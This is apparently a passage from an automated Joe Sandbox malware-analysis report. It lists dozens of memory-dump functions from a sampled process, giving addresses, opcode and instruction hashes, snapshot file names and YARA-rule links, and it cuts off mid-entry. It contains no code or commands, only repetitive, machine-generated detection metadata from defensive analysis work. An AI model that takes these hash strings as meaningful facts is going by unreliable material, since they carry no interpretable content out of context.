                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 70d191bd1d0046a48d510228af8f9b35d62757eb19d5e38219a13dc0ce0bb040
                                      • Instruction ID: 347c37917a4c2db649053f7eccb602bc85a7e7e98451e6b836681da7f47651f4
                                      • Opcode Fuzzy Hash: 70d191bd1d0046a48d510228af8f9b35d62757eb19d5e38219a13dc0ce0bb040
                                      • Instruction Fuzzy Hash: 85016935340A159FC7099B28D418A1AFBB6EBCC711B108569E90A8B3A0DF76EC02CBD1
                                      Function 0099085F Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c357902db2906dc83bc96550b7260570cc8bb390e507571d9ab58e0529b333c2
                                      • Instruction ID: 507724d011c05ffa7c93506afdb5607442d69f188031ddc6384a479564b37b86
                                      • Opcode Fuzzy Hash: c357902db2906dc83bc96550b7260570cc8bb390e507571d9ab58e0529b333c2
                                      • Instruction Fuzzy Hash: B3F0C2353092945FC715DB79E854E5E3FF5AF8E250B1500EAE445CB3A2CEA4DC05C761
                                      Function 057F4517 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f267c0c46cd44dd7044d788e6721f954523c8980732d659318dea6856ddac4e1
                                      • Instruction ID: 6454f09dc87f54e446d2fa6d9c556c3e13b7816e43d93ca2bfc9b1ff1fb7fe92
                                      • Opcode Fuzzy Hash: f267c0c46cd44dd7044d788e6721f954523c8980732d659318dea6856ddac4e1
                                      • Instruction Fuzzy Hash: 75F04F35304385AF8702DF69D888D8ABFE9BF8A62071681AAF915CB262DB60D815C751
                                      Function 057F39B8 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 965d610f0c312ebc7d94fa31008b2f4a9678ee904cba62063e5966ace59a2e3b
                                      • Instruction ID: e18c40f64762a826078186d04b48d8efe690d025fb209a95537e66580acb3f6b
                                      • Opcode Fuzzy Hash: 965d610f0c312ebc7d94fa31008b2f4a9678ee904cba62063e5966ace59a2e3b
                                      • Instruction Fuzzy Hash: A8F02B62B0E2908FD312C7785C14325BFA1DFC6318F0848DFD2858F395D9569802D350
                                      Function 057F3960 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e2b55cf52fced6191599d247c12fa57662127eda2c88e08b55d34bb28b5ac30e
                                      • Instruction ID: 33397e1034773998db268dec7040122589a65a79bcfed841553774cd9239d7b9
                                      • Opcode Fuzzy Hash: e2b55cf52fced6191599d247c12fa57662127eda2c88e08b55d34bb28b5ac30e
                                      • Instruction Fuzzy Hash: 6BF0E931B092155FE714C6199814B2BF7A9EFC9724F144429E6099B340CB72AC41C7D0
                                      Function 057F3950 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 457757950dcc9b1366b6413e83a5e2e8e6d64b75fdc0849a8f1b7629f5c26d04
                                      • Instruction ID: ed55266c9c834ecaeba0dce7622e7dfa662e75c5269454b885fac503b8fadd55
                                      • Opcode Fuzzy Hash: 457757950dcc9b1366b6413e83a5e2e8e6d64b75fdc0849a8f1b7629f5c26d04
                                      • Instruction Fuzzy Hash: C7F09072B052159FE704CA58D85876BF7A9EFC9324F14486AE609AB340CA72EC418790
                                      Function 05713C68 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00d44f2b9d45a6873ebed75011c6319c31c7b423b638cb616eb44d48c1a85a80
                                      • Instruction ID: 39be03b4e76aa08707dad32bfce0bd715457e56003797b7736378561cd4fa38f
                                      • Opcode Fuzzy Hash: 00d44f2b9d45a6873ebed75011c6319c31c7b423b638cb616eb44d48c1a85a80
                                      • Instruction Fuzzy Hash: B0F09075A01108EFDB00EFE8D844BBDB7F9EB84314F2085E9E80993260DB345E00CB50
                                      Function 00990870 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aff27c6371c68e7f84009148fb581b0e872618735dd73f75a8728bd2204629e6
                                      • Instruction ID: 37460e1870566a7f4c948b85490e5693016829bb1714b77c6a0ba168253d05f6
                                      • Opcode Fuzzy Hash: aff27c6371c68e7f84009148fb581b0e872618735dd73f75a8728bd2204629e6
                                      • Instruction Fuzzy Hash: AFF0A0357001109FC708DB7EE808E2A37EAFFCD760B2101A9E509CB3A1DEA1EC0187A0
                                      Function 0571F480 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad7dc2116fa9d26a647e63057cae65ea1ea3ffba3e52f2fd2935c39ba467266d
                                      • Instruction ID: c59d49ab2c68d97be624c885e57433a164f2e54f3302ee03c4575c471ad9a62a
                                      • Opcode Fuzzy Hash: ad7dc2116fa9d26a647e63057cae65ea1ea3ffba3e52f2fd2935c39ba467266d
                                      • Instruction Fuzzy Hash: EBF05E353503049FD714DF29D858D2AB7AAEFC8761B1140A9FA168B360CA32EC42CB90
                                      Function 00999F69 Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2652a5ab9225b1b2ada3aea2170e118f62ead33670fd9b35af35d64f4c8f87c5
                                      • Instruction ID: 951697161b764dfbd1b6df83e20e7ac7935f6494835fb1ae4d15aaa84b7dcab9
                                      • Opcode Fuzzy Hash: 2652a5ab9225b1b2ada3aea2170e118f62ead33670fd9b35af35d64f4c8f87c5
                                      • Instruction Fuzzy Hash: 85111074D16228CFEBA4DF18E988BD9B7B1FB89311F1045EAD509A2692DB305EC0DF00
                                      Function 057F5C10 Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 590938ac9ade526b8d6b22747b4390ca605c94db61c93a7be066e551ebbfa2b5
                                      • Instruction ID: d6c73f71a9641f7e4acc0fa55c5419c00558ba790b2c2229c082480cf6381866
                                      • Opcode Fuzzy Hash: 590938ac9ade526b8d6b22747b4390ca605c94db61c93a7be066e551ebbfa2b5
                                      • Instruction Fuzzy Hash: 40F08272E087489FDB0ACFA4D1497DCBFF2AB44319F0880DAD90697291EB741A85C740
                                      Function 057F1368 Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d9ee96ee0c1c6c4a72da429a7d1db50daf650a5286e813211540fc16e8ad440
                                      • Instruction ID: 8e8f88c876db4bfcaf2005bfa272fe229ee8af23568080c2a6c6fe439c6f41a8
                                      • Opcode Fuzzy Hash: 3d9ee96ee0c1c6c4a72da429a7d1db50daf650a5286e813211540fc16e8ad440
                                      • Instruction Fuzzy Hash: 24F01575E04208EFC790DFA8C8457ACBBB5EB89300F50C1AAC81997380D631AA02DF80
                                      Function 05713130 Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da69cfa069bbc919a6696991afaef2d2bf0b035afb3fa1a526dc278c985a4e86
                                      • Instruction ID: 0182eafde96dfb7606d9778313552dcaf3940b4e3088117a4e1971b5e7b5df72
                                      • Opcode Fuzzy Hash: da69cfa069bbc919a6696991afaef2d2bf0b035afb3fa1a526dc278c985a4e86
                                      • Instruction Fuzzy Hash: EBF0F875D04248AFCB80DFA9C840AADBBF9AB49300F14C5AAEC68D3341D6359A11EF50
                                      Function 057F27E9 Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5fcefdeb1a9fc04c3a3be3e18f6e64f7e02cb6275d4698a1cc0d73b0ff1f70cf
                                      • Instruction ID: d2039530627b8d62ca0efa71876c88e226a973192e79f7a4a2e1e13e3c122658
                                      • Opcode Fuzzy Hash: 5fcefdeb1a9fc04c3a3be3e18f6e64f7e02cb6275d4698a1cc0d73b0ff1f70cf
                                      • Instruction Fuzzy Hash: FBF01C34E04208AFCB40DFA8D88579DBBB4EB49214F54C5A9C849D3341D635AA01CF41
                                      Function 057F5C20 Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb070a6e95e64051dde330a99bd726820117c91751f5c9050b75018e222202fd
                                      • Instruction ID: 3c5d5433b981e3bfd2766f8c70563ebccfc58a3648bd262a0021da732cda38a0
                                      • Opcode Fuzzy Hash: fb070a6e95e64051dde330a99bd726820117c91751f5c9050b75018e222202fd
                                      • Instruction Fuzzy Hash: 19F06D31A1871CAFDB09CFA9D0486DDBFF6EB84625F048099E50B93340DB741A81CB84
                                      Function 058385E0 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef2967afb557684aced8e457bc0c098c33e066619b12c65b972ec5f906c0c30b
                                      • Instruction ID: 4d8a0b72fdbc8f8668ed9fcf697319f29d4e8f334bdbdfb4f4930df4bc05329c
                                      • Opcode Fuzzy Hash: ef2967afb557684aced8e457bc0c098c33e066619b12c65b972ec5f906c0c30b
                                      • Instruction Fuzzy Hash: FFF08C70908248ABC711CBA8CC51AADBFB4AB45201F14C1AEDC9493382D2319A51DF85
                                      Function 057FCB18 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a60b8e23993bbcf0f242dfc9b584f566042c654bbbaa93404fdb4c3c8b34f7e
                                      • Instruction ID: 290396d5e50c3b721a234765d238627a895226d821b1306166e8dd8e9f91d377
                                      • Opcode Fuzzy Hash: 2a60b8e23993bbcf0f242dfc9b584f566042c654bbbaa93404fdb4c3c8b34f7e
                                      • Instruction Fuzzy Hash: 82E0123120030A97CB14AA2BE884D4BFB9EEEC0268710D939B10A87215EE75ED058790
                                      Function 0571BA7C Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99d3bfbc9b384fda72095c61802da8378a781cb37ca9995ef276f06f594cf119
                                      • Instruction ID: 24879a7a27e7d63821eccfe40a3b8f5b93f1333f85907d5bfca97d69927111bc
                                      • Opcode Fuzzy Hash: 99d3bfbc9b384fda72095c61802da8378a781cb37ca9995ef276f06f594cf119
                                      • Instruction Fuzzy Hash: FCF0B2B091526CCBEB20DF28D848BDDBBB6BB08340F1042E9D90AA2250C7745BC5DE5A
                                      Function 05835C38 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb681a755a141534bbd8894723ad7e1ead1fc4a0dbc6ebd235640b5d8543c45c
                                      • Instruction ID: f66e17463902ffe332c3521e63769f78ddbd5d0133ac34e97d51636dce9c816c
                                      • Opcode Fuzzy Hash: cb681a755a141534bbd8894723ad7e1ead1fc4a0dbc6ebd235640b5d8543c45c
                                      • Instruction Fuzzy Hash: 9DE0DF3190620CEBCB15EFB5CC4179E7BB8EF06204F108CE9D409832A0EE324A00DBA1
                                      Function 05831980 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b364683e90031f12e38f7023ac2ec0671935880aa3494fd60a301cd63db1e61
                                      • Instruction ID: 9a7019b41a37b5d648207a292ebd27734b75a35d5cc2165634ca34520d04398c
                                      • Opcode Fuzzy Hash: 0b364683e90031f12e38f7023ac2ec0671935880aa3494fd60a301cd63db1e61
                                      • Instruction Fuzzy Hash: 02E0D83050D2459FC306CBA4CD06A69BBB5AF87204B15C5CACC48872D7C5324D07CB41
                                      Function 057F0D41 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5443144c460eaa80a8d83a3c2a1533cb342faaf3308372cf094e3d2f21719056
                                      • Instruction ID: 8175e2b8134267758c1101da7923a7e4a0d614bc7a1eca64c42fed59f68bcb0f
                                      • Opcode Fuzzy Hash: 5443144c460eaa80a8d83a3c2a1533cb342faaf3308372cf094e3d2f21719056
                                      • Instruction Fuzzy Hash: 76E04879D44208DFC750EFA8D9457ACBBF4EB45315F5481A9CC09D3341D6319B42DB51
                                      Function 057F0CF9 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf3204056cc6e1db572a9cb6fa7e72cfd96d8e1725adc55fed46ba140f7fb149
                                      • Instruction ID: c5d1c24cb100793fa73bf129e84470ad0718797c5c0b120796866ba80c2b13ca
                                      • Opcode Fuzzy Hash: bf3204056cc6e1db572a9cb6fa7e72cfd96d8e1725adc55fed46ba140f7fb149
                                      • Instruction Fuzzy Hash: 3CE02632901118EBCB10EFB8CC4A39E37A8EB01210F50C9A6C50687360EE314600CBA1
                                      Function 0571BD2F Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d25ff7145722081a9a47d057faf83e3e4238fe08899938df34ae3a2c0fe5f39
                                      • Instruction ID: 3b3afb84707c5ed274d7ec74f2a4d70f6c60f309fccbaeb047be85db6e04afae
                                      • Opcode Fuzzy Hash: 6d25ff7145722081a9a47d057faf83e3e4238fe08899938df34ae3a2c0fe5f39
                                      • Instruction Fuzzy Hash: F3F03074919618CFEB54DF38D84C799B7B2BB89304F1042E9D80DA7250DB354E85DF46
                                      Function 0571A7B1 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd394e84853afbf88d4d5206da7aa9b21bde3571d2bc5969e24bab78ecfee26b
                                      • Instruction ID: 3b3afb84707c5ed274d7ec74f2a4d70f6c60f309fccbaeb047be85db6e04afae
                                      • Opcode Fuzzy Hash: dd394e84853afbf88d4d5206da7aa9b21bde3571d2bc5969e24bab78ecfee26b
                                      • Instruction Fuzzy Hash: F3F03074919618CFEB54DF38D84C799B7B2BB89304F1042E9D80DA7250DB354E85DF46
                                      Function 05838598 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2acaff8037445ea2da580463f1843ac0697e94dc6809ac3102d5fc471167fa17
                                      • Instruction ID: 691dbbfa2cc9e5c1703fad256c31c8deb13a84028f5574020e89de74f876bbea
                                      • Opcode Fuzzy Hash: 2acaff8037445ea2da580463f1843ac0697e94dc6809ac3102d5fc471167fa17
                                      • Instruction Fuzzy Hash: B5E0D83140A648ABC721DFB88C127EB7BF4AF06200F4049AAD605C3191D93049548F92
                                      Function 05836088 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84af88b97c603d429dbfe0f1ff059f3ad009aff13abc326849edef70bf7c9a9d
                                      • Instruction ID: d7f8a5509e6a18cd37194df2d671acc8ee2eece93aed0f414725e04b2da38961
                                      • Opcode Fuzzy Hash: 84af88b97c603d429dbfe0f1ff059f3ad009aff13abc326849edef70bf7c9a9d
                                      • Instruction Fuzzy Hash: 65E09A34805208ABC710CB99D8127ACBBB8BB49205F1085D9D88853341EA329E42CB91
                                      Function 05B1BBB8 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction ID: 21cc49c67bd279102ff54eef60353e4788c7812a3c646c405f1f6904a7ded0be
                                      • Opcode Fuzzy Hash: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction Fuzzy Hash: BEE0C974D04208EFCB44DFA9D940AADBBB5FB49304F10C5AADC19A3344D635AA51DF44
                                      Function 05B1D5E0 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction ID: 5531cba793a5d55261b20104c6cabaf5af56bfa2f58e82621b924b09e5b60db5
                                      • Opcode Fuzzy Hash: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction Fuzzy Hash: BAE0C974D04208EFCB84DFA9D841AACBBB5EB49300F50C5AADC1893340D631AA51DF84
                                      Function 05B1A288 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction ID: 32ce45e7a1e54958223debf25241c61b2c4e9bd42ad4ad343cea71f61d0380e6
                                      • Opcode Fuzzy Hash: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction Fuzzy Hash: FFE0C974D05208EFCB44DFA9D8416ACBBB5FB49300F10C1AADC1997340D632AA51DF84
                                      Function 05B15AF8 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2791083524.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5b00000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction ID: fab9ff230aef46755cacad51d253b9c22a841d05ab419325199beb5d6d287fdf
                                      • Opcode Fuzzy Hash: 98963aeec2811495396729948332b0327ad4c5f02a74b58dd63ad19a0ef25e7b
                                      • Instruction Fuzzy Hash: DEE0C974E04208EFCB94DFA9D980AADBBF5FB89300F10C1AADC1993341D631AA51DF84
                                      Function 058324C0 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 72b980692101bea6288348715ca6c8f407efa18cea968f50c80cc1bc30e70bcf
                                      • Instruction ID: 91c4b6f20da12f5232e4a686ba2ab99c464143a46e2800d5a69d99cda282e424
                                      • Opcode Fuzzy Hash: 72b980692101bea6288348715ca6c8f407efa18cea968f50c80cc1bc30e70bcf
                                      • Instruction Fuzzy Hash: 63E026B9588208ABD314CB90DD52778B761EB82309F148589CC5A472D2C5335E53CA40
                                      Function 05838CD0 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82d0e029f765b177bd9a8f92cdfbc678682b19e5495c21f53f695d92f03f5536
                                      • Instruction ID: fa59316e2384b4c1470de1c88193e407dc0f5e2b02a5cd53f0532be727b643d6
                                      • Opcode Fuzzy Hash: 82d0e029f765b177bd9a8f92cdfbc678682b19e5495c21f53f695d92f03f5536
                                      • Instruction Fuzzy Hash: DEE0863050A208EBD704CF59DC41768B369FB46225F4086ADEC29832A1DA325E02CB85
                                      Function 05830FD2 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 182ce752fb9788d827a195ddded0feee6320562ab606e08a9bdb9624c59dfbf4
                                      • Instruction ID: 14e0a49281dfba50c240d7702914ce40aab9e1066c643a17e7270a1805f0dd6b
                                      • Opcode Fuzzy Hash: 182ce752fb9788d827a195ddded0feee6320562ab606e08a9bdb9624c59dfbf4
                                      • Instruction Fuzzy Hash: 7AE0C275A88148DBC718CB94DD46BA97762EB46319F25DAC8CC1D473C2CA329F03CA90
                                      Function 058370A9 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
